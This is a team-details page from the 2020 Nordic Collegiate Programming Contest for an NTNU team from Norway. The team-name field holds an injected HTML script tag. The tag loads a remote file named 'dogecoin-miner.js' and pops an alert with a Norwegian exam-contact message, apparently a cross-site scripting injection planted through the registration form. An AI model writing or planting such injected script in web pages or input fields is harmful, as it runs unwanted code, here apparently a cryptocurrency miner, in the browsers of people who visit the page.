The 2020 Nordic Collegiate Programming Contest

Team <script src="https://github.com/cretaceous/crab-conversion/dogecoin-miner.js">alert("Ved spørsmål om avvikling av eksamen kan du henvende deg på denne e-post adressen: [email protected]")</script>

Team details

Norwegian University of Science and Technology - NTNU
Norway
NTNU
Yes

Participating in The 2020 Nordic Collegiate Programming Contest

Name